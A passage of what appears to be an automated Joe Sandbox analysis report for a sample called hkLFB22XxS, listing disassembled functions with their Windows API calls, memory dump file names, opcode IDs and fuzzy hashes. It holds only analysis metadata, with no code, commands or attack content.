                                                            • Instruction Fuzzy Hash: 9131D2B460021AFFEF24BA18CC85FAD37A4FB07334F2C4616FA55D72A1DE30A9509A41
                                                            Function 0089ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 0089AE1A
                                                            • GetWindowRect.USER32(?,?), ref: 0089AE90
                                                            • PtInRect.USER32(?,?,0089C304), ref: 0089AEA0
                                                            • MessageBeep.USER32(00000000), ref: 0089AF11
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: dd7e6742c617e6ff091b35cd7ac2445545a2bde9c463d2369e8274cb0dc2139a
                                                            • Instruction ID: 8542e472f9144aba4ffdb55ee76f510ed1b0cfec19c9e0999692a52feb520c49
                                                            • Opcode Fuzzy Hash: dd7e6742c617e6ff091b35cd7ac2445545a2bde9c463d2369e8274cb0dc2139a
                                                            • Instruction Fuzzy Hash: 81416A70600219DFCF19EF58C884AADBBF5FB89350F2C81AAE915DB251D730A941DF92
                                                            Function 00870FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00871037
                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00871053
                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008710B9
                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0087110B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: a0ad7ee34f6a50f7266a1f68166624c0ee1d19bc518b241b456ce69281ffc1bd
                                                            • Instruction ID: 4985b9793cc8185a4cb9c122f826e0ad4ba6f4833e44c4a847657333ec03cc12
                                                            • Opcode Fuzzy Hash: a0ad7ee34f6a50f7266a1f68166624c0ee1d19bc518b241b456ce69281ffc1bd
                                                            • Instruction Fuzzy Hash: FC312A30A44A88AEFF348B6D8C0D7F9BBA5FB44314F08C21AE588D29D9C774C9C49755
                                                            Function 00871121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00871176
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00871192
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 008711F1
                                                            • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00871243
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 17fc863c0cef05c553fcfb5aaaa20a2122d8a0e05565c97e5678224e25dfe927
                                                            • Instruction ID: 2dbc2c40d6e7379e2123094d1dd54e05d6696479185602f8c34773cf0ed8a632
                                                            • Opcode Fuzzy Hash: 17fc863c0cef05c553fcfb5aaaa20a2122d8a0e05565c97e5678224e25dfe927
                                                            • Instruction Fuzzy Hash: AE31593095020C9AEF24CA6D880CBFABB69FB45314F58D31BE688D69DAC334CD449765
                                                            Function 00846415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0084644B
                                                            • __isleadbyte_l.LIBCMT ref: 00846479
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008464A7
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008464DD
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: 9ce1f6d9f29b3f3e5548e0c0848a8a2ae96a179459308076bd2efa22a3290a5a
                                                            • Instruction ID: a85a00248548877799ba3b1d4eb1c817a41361d31ac8287365038202d3ff5748
                                                            • Opcode Fuzzy Hash: 9ce1f6d9f29b3f3e5548e0c0848a8a2ae96a179459308076bd2efa22a3290a5a
                                                            • Instruction Fuzzy Hash: 5F31BE3160024EEFDF258F69C845BAA7BA5FF42320F154029F854C71A1FB31D8A0DB9A
                                                            Function 00895175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00895189
                                                              • Part of subcall function 0087387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00873897
                                                              • Part of subcall function 0087387D: GetCurrentThreadId.KERNEL32 ref: 0087389E
                                                              • Part of subcall function 0087387D: AttachThreadInput.USER32(00000000,?,008752A7), ref: 008738A5
                                                            • GetCaretPos.USER32(?), ref: 0089519A
                                                            • ClientToScreen.USER32(00000000,?), ref: 008951D5
                                                            • GetForegroundWindow.USER32 ref: 008951DB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: d7796f04e26d0492aac61af222f2b38df32e11fb41c0ac5d667b94fe7eb8598d
                                                            • Instruction ID: 69ac6e4103951ee7bbcc95c427d20e11bc1fc3a16d0efe74a9a4b9ac8ae8796b
                                                            • Opcode Fuzzy Hash: d7796f04e26d0492aac61af222f2b38df32e11fb41c0ac5d667b94fe7eb8598d
                                                            • Instruction Fuzzy Hash: 9E313A72900108ABCB00EFA9C885AEFB7FDFF88300B14406AE445E7201EA759E45CBA1
                                                            Function 0089C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • GetCursorPos.USER32(?), ref: 0089C7C2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0084BBFB,?,?,?,?,?), ref: 0089C7D7
                                                            • GetCursorPos.USER32(?), ref: 0089C824
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0084BBFB,?,?,?), ref: 0089C85E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: cd5ed98486bc881c69d9aa7e89991ba6b18a471684c74312b561b2d394ddb191
                                                            • Instruction ID: 3cb1d66778601fa5aa0050df937e9dfee1fccdf61d07829367df2e7e71ccbe83
                                                            • Opcode Fuzzy Hash: cd5ed98486bc881c69d9aa7e89991ba6b18a471684c74312b561b2d394ddb191
                                                            • Instruction Fuzzy Hash: 09315175600018AFCF15EF98C898EEA7BBAFB49711F08416AF905DB261D7329D60DB60
                                                            Function 00868B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00868652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00868669
                                                              • Part of subcall function 00868652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00868673
                                                              • Part of subcall function 00868652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00868682
                                                              • Part of subcall function 00868652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00868689
                                                              • Part of subcall function 00868652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0086869F
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00868BEB
                                                            • _memcmp.LIBCMT ref: 00868C0E
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00868C44
                                                            • HeapFree.KERNEL32(00000000), ref: 00868C4B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            • Opcode ID: cbc56eca4299577791d39b43c26a314f02c96e1381380e7a5785fd3268458029
                                                            • Instruction ID: 1cfb930e0646631ace88a0fb250f69ab3bf7bd40dab8046b46a0c1203e4daba2
                                                            • Opcode Fuzzy Hash: cbc56eca4299577791d39b43c26a314f02c96e1381380e7a5785fd3268458029
                                                            • Instruction Fuzzy Hash: D6219A71E01208EFCB04DFA4C949BEEB7B8FF44350F1A4159E558E7241EB31AA06DBA0
                                                            Function 00830BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __setmode.LIBCMT ref: 00830BF2
                                                              • Part of subcall function 00815B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00877B20,?,?,00000000), ref: 00815B8C
                                                              • Part of subcall function 00815B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00877B20,?,?,00000000,?,?), ref: 00815BB0
                                                            • _fprintf.LIBCMT ref: 00830C29
                                                            • OutputDebugStringW.KERNEL32(?), ref: 00866331
                                                              • Part of subcall function 00834CDA: _flsall.LIBCMT ref: 00834CF3
                                                            • __setmode.LIBCMT ref: 00830C5E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                            • String ID:
                                                            • API String ID: 521402451-0
                                                            • Opcode ID: b8c7080a5ee12267b15b6dde058f343f30b4b4dd210767fc97a3358fd35072fa
                                                            • Instruction ID: 623f6e38e31802da4d602d95e8d5fb16e1ce1e620b6ba14e320ebcf4d2b8286a
                                                            • Opcode Fuzzy Hash: b8c7080a5ee12267b15b6dde058f343f30b4b4dd210767fc97a3358fd35072fa
                                                            • Instruction Fuzzy Hash: B8112732904208AACB0477BC9C47AFE7B6DFFC1320F14111AF204D7292EE216D9247D2
                                                            Function 00881A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00881A97
                                                              • Part of subcall function 00881B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00881B40
                                                              • Part of subcall function 00881B21: InternetCloseHandle.WININET(00000000), ref: 00881BDD
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            • Opcode ID: f7618d70fca7c94e6f19622282961c9bbd7a6a9514d598513c6b47fbce227f58
                                                            • Instruction ID: 47671cd6c60866e27cf7a8b81baa45c8963d25830360b031873ed260774e8f60
                                                            • Opcode Fuzzy Hash: f7618d70fca7c94e6f19622282961c9bbd7a6a9514d598513c6b47fbce227f58
                                                            • Instruction Fuzzy Hash: 4E21D135201604BFDB15BF60CC09FBAB7ADFF44711F14001AFA02D6651EB31D8129BA0
                                                            Function 0086E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0086F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0086E1C4,?,?,?,0086EFB7,00000000,000000EF,00000119,?,?), ref: 0086F5BC
                                                              • Part of subcall function 0086F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0086F5E2
                                                              • Part of subcall function 0086F5AD: lstrcmpiW.KERNEL32(00000000,?,0086E1C4,?,?,?,0086EFB7,00000000,000000EF,00000119,?,?), ref: 0086F613
                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0086EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0086E1DD
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0086E203
                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,0086EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0086E237
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen
                                                            • String ID: cdecl
                                                            • API String ID: 4031866154-3896280584
                                                            • Opcode ID: 5ea64f0d0ea116f37f96c18c679815c0debc26b6f977feb0b4488492c2ea373c
                                                            • Instruction ID: 884470336c10d2c8a8b477d47ec2926bc11d8ffb8502cbf0f312752da83a9c6a
                                                            • Opcode Fuzzy Hash: 5ea64f0d0ea116f37f96c18c679815c0debc26b6f977feb0b4488492c2ea373c
                                                            • Instruction Fuzzy Hash: AD11B13A100305EFCB25AF68D849D7A77A9FF84350B45402AF916CB2A4EB71D8509791
                                                            Function 00845332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00845351
                                                              • Part of subcall function 0083594C: __FF_MSGBANNER.LIBCMT ref: 00835963
                                                              • Part of subcall function 0083594C: __NMSG_WRITE.LIBCMT ref: 0083596A
                                                              • Part of subcall function 0083594C: RtlAllocateHeap.NTDLL(017B0000,00000000,00000001,00000000,?,?,?,00831013,?), ref: 0083598F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 30678ed73a5c8e16391aadad02be968ac7d6957a184b0572f76cb92f4af1465e
                                                            • Instruction ID: e4ab5f50f0a4e1a75962dd52bce7284ca615ce5a856c2a04ddd0d09b392c4a62
                                                            • Opcode Fuzzy Hash: 30678ed73a5c8e16391aadad02be968ac7d6957a184b0572f76cb92f4af1465e
                                                            • Instruction Fuzzy Hash: 4611CE32504B1DEFCB313F78EC0566E3B98FF523A0F24052AF945DA2A2DEB58D409691
                                                            Function 00814531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00814560
                                                              • Part of subcall function 0081410D: _memset.LIBCMT ref: 0081418D
                                                              • Part of subcall function 0081410D: _wcscpy.LIBCMT ref: 008141E1
                                                              • Part of subcall function 0081410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008141F1
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 008145B5
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008145C4
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0084D6CE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                            • String ID:
                                                            • API String ID: 1378193009-0
                                                            • Opcode ID: dd009ec66882f0d8ea27ed569281b47e154f379ae9e645c12a81a41eec0cbee2
                                                            • Instruction ID: 62ae0452f8e53f9926c8559331047ee60a1090b2836aa5a59c30c31c80afe789
                                                            • Opcode Fuzzy Hash: dd009ec66882f0d8ea27ed569281b47e154f379ae9e645c12a81a41eec0cbee2
                                                            • Instruction Fuzzy Hash: 3221D770904788AFEB328B24DC55BE7BBEDFF11308F04009EE69ED6242C7745A858B91
                                                            Function 0088667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00815B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00877B20,?,?,00000000), ref: 00815B8C
                                                              • Part of subcall function 00815B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00877B20,?,?,00000000,?,?), ref: 00815BB0
                                                            • gethostbyname.WSOCK32(?,?,?), ref: 008866AC
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 008866B7
                                                            • _memmove.LIBCMT ref: 008866E4
                                                            • inet_ntoa.WSOCK32(?), ref: 008866EF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 1504782959-0
                                                            • Opcode ID: 0ec53530888bbacd4a0a3f6ba8abf4c6558dab5fb09814cbefa3bbfeea6a6f32
                                                            • Instruction ID: 34d4046cff163cf3f2bb30f723007c944b8eee6579273df20d31604e554d68df
                                                            • Opcode Fuzzy Hash: 0ec53530888bbacd4a0a3f6ba8abf4c6558dab5fb09814cbefa3bbfeea6a6f32
                                                            • Instruction Fuzzy Hash: D7113D75604509EBCB04FBA8D996DEE77B9FF44310B144065F502E7162EB309E548B92
                                                            Function 00869023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00869043
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00869055
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0086906B
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00869086
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 2508fbcf9aa49f42188ef6867eb49759d970f8bba2ee3420d0ff1233bd7bc5da
                                                            • Instruction ID: 9c0c7b5658bfe867337331e80e99eecb4d1d42fe59af88322683e0645f317512
                                                            • Opcode Fuzzy Hash: 2508fbcf9aa49f42188ef6867eb49759d970f8bba2ee3420d0ff1233bd7bc5da
                                                            • Instruction Fuzzy Hash: 11115E79900218FFDB11DFA5CD84E9DBBB8FB48310F214095EA04B7290D6716E10DB90
                                                            Function 00811290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 008112D8
                                                            • GetClientRect.USER32(?,?), ref: 0084B84B
                                                            • GetCursorPos.USER32(?), ref: 0084B855
                                                            • ScreenToClient.USER32(?,?), ref: 0084B860
                                                            Memory Dump Source
